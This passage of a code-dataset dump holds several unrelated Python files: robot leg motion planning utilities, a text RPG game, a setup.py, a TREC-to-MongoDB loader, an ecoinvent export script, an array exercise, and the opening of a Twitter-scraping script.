2 * project_constants.HM_Y_GRANULARITY\n normal = [x_grad, y_grad, 1 ]\n normal_magnitude = MathUtils._3d_vector_magnitude(normal)\n if normal_magnitude > .0001:\n normal /= MathUtils._3d_vector_magnitude(normal)\n else:\n normal = [0,0,1]\n end_effector_vector = [0,0,1]\n axis = MathUtils._3d_vector_cross_product(normal, end_effector_vector)\n angle = -MathUtils.angle_between_two_3d_vectors(normal, end_effector_vector)\n axis_magnitude = MathUtils._3d_vector_magnitude(axis)\n if axis_magnitude > .0001:\n axis /= axis_magnitude\n rotation_R = so3.from_axis_angle((axis,angle))\n R = 
so3.mul(rotation_R, upright)\n if visualize_normal:\n VisUtils.visualize_line(\n xyz, [xyz[0] + normal[0], xyz[1] + normal[1], xyz[2] + normal[2]], \"unit normal for {end_effector}\")\n if not so3.is_rotation(R): Logger.log(\"Failure - calculated matrix is NOT a rotation matrix\", \"FAIL\")\n xyz[2] += project_constants.END_EFFECTOR_HEIGHT\n if debug:print(\"for end effector:\",end_effector,\"at xyz:\",Logger.pp_list(xyz),\" normal:\",normal,\"R:\",Logger.pp_list(R))\n return R\n else:\n if yaw_rad is None:\n yaw_rad = self.get_current_torso_yaw_rads()\n yaw_rotation_aa = ([0, 0, 1], yaw_rad)\n yaw_rotation_R = so3.from_axis_angle(yaw_rotation_aa)\n R = so3.mul(yaw_rotation_R, upright)\n return R\n\n def get_linear_mid_motion_xyzR(self, xyzR0, xyzRf, i, imax):\n\n xyz0 = xyzR0[0:3]\n xyzf = xyzRf[0:3]\n xyz = self.get_linear_3d_mid_motion_vals(xyz0, xyzf, i, imax)\n R = MathUtils.mid_motion_rotation_matrix(xyzR0[3], xyzRf[3], i, imax)\n return xyz+[R]\n\n def get_parabolic_mid_motion_xyzR(self, xyzR0, xyzRf, i, imax, step_height):\n\n xyz0 = xyzR0[0:3]\n xyzf = xyzRf[0:3]\n xyz = self.get_parabolic_mid_motion_xyz(xyz0, xyzf, i, imax, step_height)\n R = MathUtils.mid_motion_rotation_matrix(xyzR0[3], xyzRf[3], i, imax)\n return xyz+[R]\n\n # --------------- End of New Code\n\n def get_support_triangle_from_stance_idx(self, stance_idx, name=None):\n stance = self.stance_path[stance_idx]\n fl_xyz, fr_xyz, br_xyz, bl_xyz = self.get_end_affector_xyzs_from_curr_stance(stance)\n\n support_triangle_points = [fl_xyz, fr_xyz, br_xyz, bl_xyz]\n support_triangle_points.pop(stance[4] - 1)\n\n moving_leg = self.get_moving_leg(stance)\n if moving_leg == 1:\n diag_points = [True, False, True]\n elif moving_leg == 2:\n diag_points = [True, True, False]\n elif moving_leg == 3:\n diag_points = [False, True, True]\n elif moving_leg == 4:\n diag_points = [True, False, True]\n else:\n Logger.log(\"moving leg unrecognized\", \"FAIL\")\n diag_points = []\n exit()\n\n next_support_tri = self.get_support_triangle_from_points(support_triangle_points, diag_points, name=name)\n return next_support_tri\n\n def get_moving_leg(self, stance):\n return stance[4]\n\n def get_moving_leg_from_stance_idx(self, stance_idx):\n stance = self.stance_path[stance_idx]\n return self.get_moving_leg(stance)\n\n def get_end_effector_range_circles(self, stance_idx, visualize=False, ignore_leg=None, only_include_current_holds=False):\n stance = self.stance_path[stance_idx]\n fl_xyz_current, fr_xyz_current, br_xyz_current, bl_xyz_current = self.get_end_affector_xyzs_from_curr_stance(stance)\n current_fs_holds = [fl_xyz_current, fr_xyz_current, br_xyz_current, bl_xyz_current]\n current_end_effectors = [1, 2, 3, 4]\n if not ignore_leg:\n if not only_include_current_holds:\n stance_next = self.stance_path[stance_idx + 1]\n fl_xyz_next, fr_xyz_next, br_xyz_next, bl_xyz_next = self.get_end_affector_xyzs_from_curr_stance(stance_next)\n next_fs_holds = [fl_xyz_next, fr_xyz_next, br_xyz_next, bl_xyz_next]\n next_end_effectors = [1, 2, 3, 4]\n new_hold = [next_fs_holds[stance[4] - 1]]\n next_end_effector = [next_end_effectors[stance[4] - 1]]\n end_effectors = current_end_effectors + next_end_effector\n all_holds = current_fs_holds + new_hold\n else:\n end_effectors = current_end_effectors\n all_holds = current_fs_holds\n else:\n end_effectors = current_end_effectors\n end_effectors.pop(ignore_leg-1)\n current_fs_holds.pop(ignore_leg-1)\n all_holds = current_fs_holds\n ranges = []\n for i in range(len(all_holds)):\n end_effector = end_effectors[i]\n 
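            # One 2D reachability circle per foothold; the torso xy should
            # stay near the intersection of these circles (and inside the
            # support triangle) so every planted leg remains within reach.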
point = all_holds[i]\n circle_ = self.get_end_effector_2D_range_circle(end_effector, at_point=point)\n ranges.append(circle_)\n if visualize:\n circle_.visualize()\n return ranges\n\n def get_torso_z_des_from_xy(self, torso_xy, curr_state, debug=False):\n\n # TODO: This requires more consideration\n\n fl_xyzc, fr_xyzc, br_xyzc, bl_xyzc = self.get_end_affector_xyzs_from_curr_stance(curr_state)\n end_eff_zs = np.array([fl_xyzc[2],fr_xyzc[2],bl_xyzc[2], br_xyzc[2]])\n z_endeff_ave = np.average(end_eff_zs)\n z_env = self.height_map.height_at_xy(torso_xy[0], torso_xy[1])\n min_torso_clearance = project_constants.MIN_TORSO_CLEARANCE\n torso_z_des = project_constants.TORSO_Z_DESIRED\n\n # if debug: print \"z_env:\", z_env, \"\\tz_endeff_ave:\", z_endeff_ave, \"\\tz_endeff_stddev:\", z_endeff_stddev, \"\\t z_endeff_ave + min_torso_clearance:\",logger.pp_double(z_endeff_ave + min_torso_clearance)\n # note: THis will cause torso z 'jumps' if the torso goes over an obstacle which goes above the torso clearance\n if z_env > z_endeff_ave + min_torso_clearance:\n z_ret = z_env + min_torso_clearance\n # if debug: print \"z_env > z_endeff_ave + min_torso_clearance \\tz:\",logger.pp_double(z_ret)\n else:\n z_ret = z_endeff_ave + torso_z_des\n # if debug: print \"z_ret = z_endeff_ave + torso_z_des :\\t\",logger.pp_double(z_ret)\n return z_ret\n\n def adjust_endeff_z(self, xyz):\n offset = project_constants.END_EFFECTOR_HEIGHT\n # z = self.height_map.height_at_xy(xyz[0], xyz[1])\n xyz_new = [xyz[0], xyz[1], xyz[2] + offset]\n return xyz_new\n\n def print_state_list(self):\n for stance in self.stance_path:\n print(\"\\n \", stance)\n print(\" \", Logger.pp_list(self.scatter_list[stance[0]]), \", \", Logger.pp_list(\n self.scatter_list[stance[1]]), \", \", Logger.pp_list(self.scatter_list[stance[2]]), \", \", Logger.pp_list(\n self.scatter_list[stance[3]]))\n\n def get_optimized_torso_xy_yaw_deg(self, current_support_tri, static_range_circles, moving_end_eff_xyz, current_average_xy_yaw_deg, ignore_moving_end_eff=False, debug=False):\n\n outbound_limiter = 100\n outbound_scaler = 5.0\n inbound_scalar = 1.0\n\n def cost(xy_yaw_deg):\n torso_x = xy_yaw_deg[0]\n torso_y = xy_yaw_deg[1]\n torso_xy = [torso_x, torso_y]\n torso_yaw_rad = np.deg2rad(xy_yaw_deg[2])\n torso_xy_shapely_point = Point(torso_x, torso_y)\n\n if not ignore_moving_end_eff:\n moving_end_eff_range_circle_radius = self.get_torso_range_from_end_effector(4, at_point=moving_end_eff_xyz, yaw_rads=torso_yaw_rad)\n moving_end_eff_range_circle = LegRange(moving_end_eff_xyz, moving_end_eff_range_circle_radius, self.height_map)\n range_circles = static_range_circles + [moving_end_eff_range_circle]\n else:\n range_circles = static_range_circles\n\n if not current_support_tri.point_is_inside(torso_xy):\n dist = current_support_tri.get_shapely_poly().boundary.distance(torso_xy_shapely_point)\n cost = outbound_scaler * dist + outbound_limiter\n #print \" - outbound valus:\", logger.pp_list(xy_yaw_deg), \"has cost:\", cost\n return cost\n\n dist = 0\n for range_circle in range_circles:\n dist += range_circle.get_shapely_poly().distance(torso_xy_shapely_point)\n cost = inbound_scalar * dist\n #print \" - inbound valus:\", logger.pp_list(xy_yaw_deg), \"has cost:\", cost\n return cost\n\n ret_obj = optimize.minimize(cost, current_average_xy_yaw_deg)\n ret_val = np.ndarray.tolist(ret_obj.x)\n\n if cost(ret_obj.x) > outbound_limiter - .01:\n if debug:\n Logger.log(\"Error, could not find xy inside of support triangle\", \"FAIL\")\n print(ret_obj)\n return False\n 
else:\n if ret_obj.success:\n #print \"get_optimized_torso_xy_yaw_deg(): success! returning:\",ret_val\n return ret_val\n else:\n Logger.log(\"Error, could not find xy inside of support triangles, range circles\", \"FAIL\")\n return False\n\n def get_end_effector_2D_range_circle(self, end_effector, circle_name = None, at_point=None, yaw_rads=None):\n\n '''\n @summary returns a _2DLegRadius object given the end effectors name\n @param link_name: string specifiing the link name\n @param circle_name: name of circle\n @return: _2DLegRadius object\n '''\n\n r = self.get_torso_range_from_end_effector(end_effector, at_point=at_point, yaw_rads=yaw_rads)\n global_xyz = self.get_end_effector_from_end_effector_number(end_effector).getWorldPosition([0,0,0])\n if at_point:\n global_xyz = at_point\n return LegRange(global_xyz, r, self.height_map, name=circle_name)\n\n def get_support_triangle_from_points(self, P, diag_points, name=None):\n '''\n @summary returns a SupportTriangle created by the parameterized array of Points\n @param P: list of xyz coordinates\n @return: SupportTriangle object\n '''\n support_tri = SupportTriangle(P, self.height_map, diag_points, name=name)\n support_tri.enforce_safety_margin(project_constants.SUPPORT_TRIANGLE_SAFETY_MARGIN)\n return support_tri\n\n def get_centroid_from_multiple_poly_intersections(self, support_triangles, add_z=None, closest_to=None):\n if len(support_triangles) < 2:\n Logger.log(\"Error: support_triangles have less than two objects\", \"FAIL\")\n return False\n first_obj = support_triangles[0]\n rest = support_triangles[1:]\n ret = first_obj.xy_centroid_from_o_3dgeoms(rest, closest_to=closest_to)\n if add_z:\n ret = [ret[0], ret[1], add_z]\n return ret\n\n def get_current_torso_xy_yaw_deg(self):\n q = self.robosimian.getConfig()\n xyz_yaw = [q[0], q[1], np.rad2deg(q[3])]\n return xyz_yaw\n\n def get_current_torso_xyz_yaw_deg(self):\n q = self.robosimian.getConfig()\n xyz_yaw = [q[0], q[1], q[2], np.rad2deg(q[3])]\n return xyz_yaw\n\n def get_linear_3d_mid_motion_vals(self, start, end, _i, _i_max):\n x_delta = end[0] - start[0]\n y_delta = end[1] - start[1]\n z_delta = end[2] - start[2]\n try:\n x = start[0] + (_i / _i_max) * x_delta\n except ZeroDivisionError:\n x = start[0]\n try:\n y = start[1] + (_i / _i_max) * y_delta\n except ZeroDivisionError:\n y = start[1]\n try:\n z = start[2] + (_i / _i_max) * z_delta\n except ZeroDivisionError:\n z = start[2]\n return [x, y, z]\n\n def get_parabolic_mid_motion_xyz(self, startXYZ, endXYZ, i, i_max, step_height):\n\n # prevents division by 0\n if i == 0: i = 1\n\n x_start = float(startXYZ[0])\n y_start = float(startXYZ[1])\n z_start = float(startXYZ[2])\n\n x_end = float(endXYZ[0])\n y_end = float(endXYZ[1])\n z_end = float(endXYZ[2])\n\n x_delta = x_end - x_start\n y_delta = y_end - y_start\n z_delta = z_end - z_start\n delta_xy_total = MathUtils._3d_euclidian_distance( [x_start,y_start,0], [x_end, y_end, 0] )\n\n x = x_start + (float(i) / float(i_max) * x_delta)\n y = y_start + (float(i) / float(i_max) * y_delta)\n z = z_start + (float(i) / float(i_max) * z_delta)\n delta_xy = MathUtils._3d_euclidian_distance([x,y,0],[x_start,y_start,0])\n\n height_offset = 0\n if delta_xy_total > .0001:\n height_offset = (-4*step_height*delta_xy*(delta_xy-delta_xy_total)) / delta_xy_total\n # see https://www.desmos.com/calculator/v8wb6o83jh\n return [ x, y, z + height_offset ]\n\n def get_torso_rotation_matrix_from_yaw_deg(self, yaw_deg):\n curr_yaw_deg = self.get_current_torso_yaw_deg()\n offset = yaw_deg - curr_yaw_deg\n 
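        # Express the absolute target yaw as an offset from the current
        # heading, then delegate to the offset-based helper.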
return self.get_torso_rotation_matrix_from_yaw_deg_offset(offset)\n\n def get_current_torso_yaw_deg(self):\n q = self.robosimian.getConfig()\n deg = np.rad2deg(q[3])\n return deg\n\n def get_current_torso_yaw_rads(self):\n return self.robosimian.getConfig()[3]\n\n def get_torso_rotation_matrix_from_yaw_deg_offset(self, yaw_offset_deg):\n current_torso_yaw_rad = self.get_current_torso_yaw_rads()\n desired_torso_yaw_rad = current_torso_yaw_rad + np.deg2rad(yaw_offset_deg)\n axis_angle = ([0,0,1], desired_torso_yaw_rad)\n desired_r = so3.from_axis_angle(axis_angle)\n return desired_r\n\n #TODO: Update to include non level/flat end effectors\n def get_torso_range_from_end_effector(self, end_effector, at_point=None, yaw_rads=None):\n R = project_constants.END_AFFECTOR_RADIUS_TO_SHOULDER\n S = project_constants.SHOULDER_TORSO_XY_EUCLIDEAN_DIF\n yaw = self.get_current_torso_yaw_rads()\n if yaw_rads: yaw = yaw_rads\n psi = project_constants.SHOULDER_TORSO_PSI_RADS\n shoulder_link = self.get_shoulder_from_end_effector(end_effector)\n shoulder_world_xyz = shoulder_link.getWorldPosition([0, 0, 0])\n if end_effector == 1:\n link_global_xyz = self.fl_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = shoulder_world_xyz[0] - link_global_xyz[0]\n leg_dy = shoulder_world_xyz[1] - link_global_xyz[1]\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + (- S * np.cos((np.pi / 2) - (yaw + psi)))\n delta_x_max = R * np.cos(theta) + (- S * np.sin((np.pi / 2) - (yaw + psi)))\n elif end_effector == 4:\n link_global_xyz = self.bl_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = shoulder_world_xyz[0] - link_global_xyz[0]\n leg_dy = shoulder_world_xyz[1] - link_global_xyz[1]\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + (- S * np.sin(psi - yaw))\n delta_x_max = R * np.cos(theta) + (S * np.cos(psi - yaw))\n elif end_effector == 2:\n link_global_xyz = self.fr_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = shoulder_world_xyz[0] - link_global_xyz[0]\n leg_dy = shoulder_world_xyz[1] - link_global_xyz[1]\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + S * np.sin(yaw - psi - np.pi)\n delta_x_max = R * np.cos(theta) + S * np.cos(yaw - psi - np.pi)\n else:\n link_global_xyz = self.br_end_effector.getWorldPosition([0, 0, 0])\n if at_point:\n link_global_xyz = at_point\n leg_dx = (shoulder_world_xyz[0] - link_global_xyz[0])\n leg_dy = (shoulder_world_xyz[1] - link_global_xyz[1])\n theta = np.arctan2(leg_dy, leg_dx)\n delta_y_max = R * np.sin(theta) + S * np.sin(yaw + psi)\n delta_x_max = R * np.cos(theta) + S * np.cos(yaw + psi)\n r = np.sqrt(delta_x_max ** 2 + delta_y_max ** 2)\n return project_constants.END_RANGE_MULTIPLIER * r\n\n def get_torso_R_from_yaw_rad(self, yaw_rad):\n axis_angle = ([0, 0, 1], yaw_rad)\n desired_r = so3.from_axis_angle(axis_angle)\n return desired_r\n","sub_path":"src/motion/motion_utils.py","file_name":"motion_utils.py","file_ext":"py","file_size_in_byte":44711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"326105526","text":"# ===========================\n# IMPORT MODULES\n# ===========================\n\nfrom example.classes.game import Person, Bcolors, Game\nfrom example.classes.magic import Spell\nfrom example.classes.inventory import Item\nimport random\nimport time\n\n# ========================================\n# INSTANTIATE 
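
# Two apparent slips in the motion_utils record above. First,
# get_robot_pose_from_current_stance appends the back-right transform to `fr`
# and the front-left transform to `bl` (a copy-paste slip); each leg should
# read its own end effector:
#     fr += [self.fr_end_effector.getTransform()[0]]
#     bl += [self.bl_end_effector.getTransform()[0]]
# Second, the parabolic height offset divides by delta_xy_total only once, so
# the arc's apex grows with step length instead of equalling step_height. A
# hedged standalone version with the squared denominator (zeros at 0 and
# delta_xy_total, apex exactly step_height at the midpoint):
def parabolic_height_offset(step_height, delta_xy, delta_xy_total):
    if delta_xy_total <= 1e-4:  # degenerate step, no arc
        return 0.0
    return (-4.0 * step_height * delta_xy * (delta_xy - delta_xy_total)
            / (delta_xy_total ** 2))
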
SPELLS, PLAYERS, ITEMS\n# ========================================\n\n# Create Dark Magic\n# ----------------------\nfire = Spell(\"Fire\", 10, 100, \"dark\")\nthunder = Spell(\"Thunder\", 10, 100, \"dark\")\nblizzard = Spell(\"Blizzard\", 10, 100, \"dark\")\nmeteor = Spell(\"Meteor\", 20, 200, \"dark\")\nquake = Spell(\"Quake\", 12, 120, \"dark\")\n\n# Create Light Magic\n# ----------------------\ncure = Spell(\"Cure\", 12, 120, \"light\")\ncura = Spell(\"Cura\", 18, 200, \"light\")\n\n# Create some items\n# ----------------------\npotion = Item(\"Potion\", \"potion\", \"Heal 50 HP\", 50, 20)\nhi_potion = Item(\"Hi-potion\", \"potion\", \"Heal 100 HP\", 100, 10)\nsuper_potion = Item(\"Super Potion\", \"potion\", \"Heal 500 HP\", 500, 5)\nelixer = Item(\n \"Elixer\", \"elixer\", \"Fully restores HP & MP of one party's member\", 99999, 1\n)\nmega_elixer = Item(\n \"Mega Elixer\", \"elixer\", \"Fully restores HP & MP of all party's members\", 99999, 1\n)\ngrenade = Item(\"Grenade\", \"attack\", \"Deal 500 damage\", 500, 2)\n\n# Instantiate Players & Teams\n# -----------------------\nmagic = [fire, thunder, blizzard, meteor, cure, cura]\nitems = [potion, hi_potion, super_potion, elixer, mega_elixer, grenade]\n\nprint(\n \"\"\"{}\nThis is a 3v3 RPG game, the rule is simple, just try to defeat your enemies.\nEach player takes turn to choose an enemy to attack, then choose what kind of attack you want\nor item you want to use and hit.\nFirst, choose your team members' name{}\n\"\"\".format(\n Bcolors.BOLD, Bcolors.ENDC\n )\n)\n\nplayer1_name = input(f\"{Bcolors.BOLD}{Bcolors.OKBLUE}First Player Name: {Bcolors.ENDC}\")\nplayer2_name = input(\n f\"{Bcolors.BOLD}{Bcolors.OKBLUE}Second Player Name: {Bcolors.ENDC}\"\n)\nplayer3_name = input(f\"{Bcolors.BOLD}{Bcolors.OKBLUE}Third Player Name: {Bcolors.ENDC}\")\n\nplayer1 = Person(player1_name.upper(), 500, 65, 60, 34, magic, items)\nplayer2 = Person(player2_name.upper(), 460, 65, 60, 34, magic, items)\nplayer3 = Person(player3_name.upper(), 460, 65, 60, 34, magic, items)\nenemy1 = Person(\"GREMLIN\", 1200, 65, 50, 25, magic, items)\nenemy2 = Person(\"BANSHEE\", 1200, 65, 50, 25, magic, items)\nenemy3 = Person(\"VAMPIRE\", 1200, 65, 50, 25, magic, items)\n\nteam = [player1, player2, player3]\nteam2 = [enemy1, enemy2, enemy3]\n\ngame = Game(team, team2)\n\n\nprint(\"===============================================\\n\")\nprint(\"{}{}PLAYERS' TEAM:{}\\n\".format(Bcolors.BOLD, Bcolors.OKGREEN, Bcolors.ENDC))\nfor pl in team:\n pl.get_stats(True)\nprint()\nprint(\"===============================================\\n\")\nprint(\"{}{}ENEMIES' TEAM:{}\\n\".format(Bcolors.BOLD, Bcolors.FAIL, Bcolors.ENDC))\nfor enm in team2:\n enm.get_stats(False)\nprint()\nprint(\"===============================================\\n\")\nrunning = True\n\n\n# ========================================\n# START GAME LOOP\n# ========================================\nplayer_dead = []\nbot_dead = []\nif __name__ == \"__main__\":\n while running:\n\n # Human's turn\n\n for mem in team:\n # Player name\n print(\"\\t{}{}{}\".format(Bcolors.BOLD, mem.name, Bcolors.ENDC))\n\n # Select Target\n print(\"\\t Target an enemy now !\")\n game.team_list(team2)\n target = game.get_choice(input(\"\\t Choose target: \"))\n try:\n enemy = team2[target]\n except (ValueError, IndexError, TypeError):\n print(\"Type the number only !\")\n continue\n\n # Select action\n mem.choose_action()\n select = input(\"\\t Choose action: \")\n\n # Start the fight\n game.turn(mem, enemy, select, True)\n 
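            # Re-check enemy HP after each player's action so the target list
            # offered to the next teammate reflects any defeats.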
game.check_hp(team2)\n # DELAY\n print(\"=================================\")\n print(\"{0}ENEMIES'S TURNS{1}\".format(Bcolors.BOLD, Bcolors.ENDC))\n time.sleep(2)\n\n for mem2 in team2:\n # Select action\n select2 = random.randrange(1, 4)\n # Select Target\n if len(team) > 0:\n target2 = random.randrange(len(team))\n bot_target = team[target2]\n\n # Start the fight\n game.turn(mem2, bot_target, select2, False)\n game.check_hp(team)\n else:\n print(\"{0}All Dead ! Enemies Win{1}\".format(Bcolors.BOLD, Bcolors.ENDC))\n running = False\n time.sleep(1)\n\n print(\"=================================\")\n for pl in team:\n pl.get_stats(True)\n print()\n for enm in team2:\n enm.get_stats(False)\n print()\n print(\"=================================\")\n\n if len(team) == 0:\n print(\"{} You lost! {}\".format(Bcolors.FAIL, Bcolors.ENDC))\n running = False\n elif len(team2) == 0:\n print(\n \"{}{} You win! {}\".format(Bcolors.BOLD, Bcolors.OKGREEN, Bcolors.ENDC)\n )\n running = False\n","sub_path":"example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"59850275","text":"from distutils.core import setup\nfrom os import path\n\nROOT = path.dirname(__file__)\nREADME = path.join(ROOT, 'README.rst')\n\nsetup(\n name='hurl',\n py_modules = ['hurl'],\n url='https://github.com/oinopion/hurl',\n author='Tomek Paczkowski & Aleksandra Sendecka',\n author_email='tomek@hauru.eu',\n version='1.1.dev',\n license='New BSD license',\n long_description=open(README).read(),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"127043435","text":"from __future__ import with_statement \nimport parser\nimport logging\nfrom pymongo import MongoClient\nimport gzip \nimport ConfigParser \nimport argparse\nimport os\n\n'''\nThe program reads contents from TREC collections and store them in a mongoDB after\na compression (using gzip). Usually, the collections are aparted into bag of words which break\nthe orginal structure and make a loss of syntactic information. So this can help\nto obtain the orginal contents and conduct a semantic/syntactic research in the future.\n\nUsage: trec2mongo.py --config [configFileName]\n\nThe default config file is in the same folder as this program with the name \"config.txt\"\nIn the config file, the following settings should be determined:\n\n1. MongoDB connection settings, including mongoDB server (default \"localhost\"),\nmongoDB server port(default \"27017\"), database name (default \"trec\"), \ncompress level(default 5).\n\n2. 
TREC collection settings, including the name of a file which contains the list\nof collection file names with full path, collection name (wt2g, wt10g, blog, gov2...)\n\nA tradition config file is like:\n\n[mongoDB]\nhost = localhost\nport = 27017\ndbname = trec\nDBcollection = wt2g\ncompressLevel = 5\n\n[Trec]\ntrecCollectionFiles =\ntrecCollectionName = wt2g\n\n'''\n#Read config files\ndef readconfig(configFile):\n\tsettings = {}\n\tconfig=ConfigParser.ConfigParser()\n\tconfig.readfp(configFile)\n\thost = config.get(\"mongoDB\", \"host\")\n\tport = config.get(\"mongoDB\", \"port\")\n\tdbname = config.get(\"mongoDB\", \"dbname\")\n\tDBcollection = config.get(\"mongoDB\", \"DBcollection\")\n\tcompressLevel = config.get(\"mongoDB\", \"compressLevel\")\n\n\ttrecCollectionFiles = config.get(\"Trec\", \"trecCollectionFiles\")\n\ttrecCollectionName = config.get(\"Trec\", \"trecCollectionName\")\n\n\tsettings[\"host\"] = host\n\tsettings[\"port\"] = port\n\tsettings[\"dbname\"] = dbname\n\tsettings[\"DBcollection\"] = DBcollection\n\tsettings[\"compressLevel\"] = compressLevel\n\tsettings[\"trecCollectionFiles\"] = trecCollectionFiles\n\tsettings[\"trecCollectionName\"] = trecCollectionName\n\n\treturn settings\n\n\n\n\n\n\n\n#Connect to the database\n\n#Read collection files one by one and store them in the database\nlogging.basicConfig(level=logging.INFO,\n\t\t\t\tformat='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n\t\t\t\tdatefmt='%a, %d %b %Y %H:%M:%S',\n\t\t\t\tfilename='trec2mongo.log',\n\t\t\t\tfilemode='w')\n\n\nconParser = argparse.ArgumentParser(description='read contents from trec collections and store them in a mongoDB database')\nconParser.add_argument('--config', dest='config_file', action='store',default = 'config.txt',\n help='full path to the config file')\n\n#print os.getcwd()\nconfig = {}\nargs = conParser.parse_args()\nconfigFilePath = args.config_file\nwith open(configFilePath, 'r') as configFile:\n\tconfig = readconfig(configFile)\n\nlogging.info(\"Loading configurations...\")\nif(config[\"host\"] is None):\n\thost = \"localhost\"\nelse:\n\thost = config[\"host\"]\n\nif(config[\"port\"] is None):\n\tport = int(config[\"port\"])\nelse:\n\tport = int(\"27017\")\n\nif(config[\"dbname\"] is None):\n\tdbname = \"trec\"\nelse:\n\tdbname = config[\"dbname\"]\n\nif(config[\"DBcollection\"] is None):\n\tDBcollection = \"wt2g\"\nelse:\n\tDBcollection = config[\"DBcollection\"]\n\nif(config[\"compressLevel\"] is None):\n\tcompressLevel = int(config[\"compressLevel\"])\nelse:\n\tcompressLevel = int(\"5\")\n\nif(config[\"trecCollectionFiles\"] is None):\n\tlogging.warning(\"The trec collection file is missing\")\n\texit(1)\nelse:\n\ttrecCollectionFiles = config[\"trecCollectionFiles\"]\n\nif(config[\"trecCollectionName\"] is None):\n\tlogging.warning(\"The trec collection name is missing\")\n\texit(1)\nelse:\n\ttrecCollectionName = config[\"trecCollectionName\"]\n\nlogging.info(\"Loading configurations successfully\")\n\n#Connect to the database\n\nclient = MongoClient(host, port)\nif client is None:\n\tlogging.warning(\"Databased connection failed\")\n\texit(1)\n\ndb = client[dbname]\ndbcol = db[DBcollection]\n\nlogging.info(\"Starting to processing collection \" + trecCollectionName)\nif trecCollectionName.lower() == \"wt2g\":\n\twith open(trecCollectionFiles, 'r') as colFiles:\n\t\tfor colFile in colFiles:\n\t\t\twith gzip.open(colFile.strip(),'r') as wt2gFile:\n\t\t\t\tparser.wt2g(wt2gFile, dbcol, compressLevel)\n\t\t\t\tlogging.info(\"File \" + 
colFile.strip() + \" is done \\n\")\n\n\nclient.close()\n\n\n\n\n\n","sub_path":"Python/trec2mongoDB/trec2mongo.py","file_name":"trec2mongo.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"196950804","text":"# -*- coding: utf-8 -*-\nimport utils, pyprind, excel_template, os\nimport spold2_reader as spold2\nversion = '3.4'\nsystem_model = 'Undefined'\nfolder = utils.version_system_model_path(version, system_model)\nao = utils.pkl_load(os.path.join(folder, 'pkl'), 'ao')\nao = ao[ao['geography'] == 'RER']\nao = ao[ao['activityName'] == 'treatment of waste glass from unsorted public collection, sorting']\nfilelist = list(set(ao['filename']))\ndataset_folder = os.path.join(folder, 'datasets')\ndatasets = [spold2.Dataset(dataset_folder, filename)\n for filename in pyprind.prog_bar(filelist, title = 'loading dataset')]\nresult_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\external\\PEF\\PEF_chemicals\\technical\\output'\nresult_filename = 'cullet.xlsx'\nexcel_template.assemble_for_templates(datasets, result_folder, result_filename)","sub_path":"projects/PEF_correction/cullet.py","file_name":"cullet.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"368325654","text":"if __name__ == '__main__':\n \n A = [3, 1, 4, 7, 5, 100, 10]\n B = []\n lent = 0\n\n for i, elem in enumerate(A):\n if i < len(A)-1:\n B.append(A[i+1]-A[i])\n lent += 1\n \n print(B)\n\n curr_diff = B[0]\n for i in range(lent-1):\n k = i+1\n if B[i] > 0:\n temp = B[i] + B[k]\n B[k] = temp\n curr_diff = max(curr_diff, temp)\n else:\n curr_diff = B[k]\n\n \n print(curr_diff)\n\n'''\n\nExplanation:\n\nProblem:\nFind max difference in an array. for ex: if array = [3, 1, 4, 7, 5, 100, 10], \nwe can see that 100 - 1 = 99 would be the max difference possible.\n\nLogic:\nSimple approach can be, O(n^2) where for each elem take minus of all other \nand keep updating the max_difference.\n\nIn this program, we first found out the max diff subarray. Now from that, \nwe applied algo as follows:\nmaintain 2 pointers i and k, where k = i+1\niterate of B and if first elem is negative, curr_diff should be kth elem\nif the elem is +ve then add the itk and kth and store at kth,\nnow find the max of curr_diff and kth elem newly updated and store in curr_diff\n\nHow logic works:\nso if you check properly, in above series of steps, we did,\na[2]-a[1]+a[3]-a[2]+a[4]-a[3]+a[5]-a[4] = a[5]-a[1] = 100-1 = 99\nthink mathematically\n\n'''","sub_path":"Misc/Arrays/max_diff_in_given_array.py","file_name":"max_diff_in_given_array.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"638811393","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nCreated on Sun Dec 20 18:40:33 2020\n\nThis script allows the user to collects dehydrated and hydrated tweets from\nTwitter accounts.The default Twitter accounts were selected by hand. \nFeel free to change the ones selected in this script. Tweets extractions is\naccomplish using Tweepy. 
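
# Note on the trec2mongo record above: the port and compressLevel fallbacks
# are inverted -- when the value is missing the code calls int(None) (a
# TypeError), and when it is present the hard-coded default wins anyway. A
# hedged sketch of the intended pattern, assuming `config` is the dict
# returned by readconfig():
def with_default(value, default):
    # Fall back only when the configured value is missing or empty.
    return value if value not in (None, "") else default

host = with_default(config.get("host"), "localhost")
port = int(with_default(config.get("port"), "27017"))
compressLevel = int(with_default(config.get("compressLevel"), "5"))
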
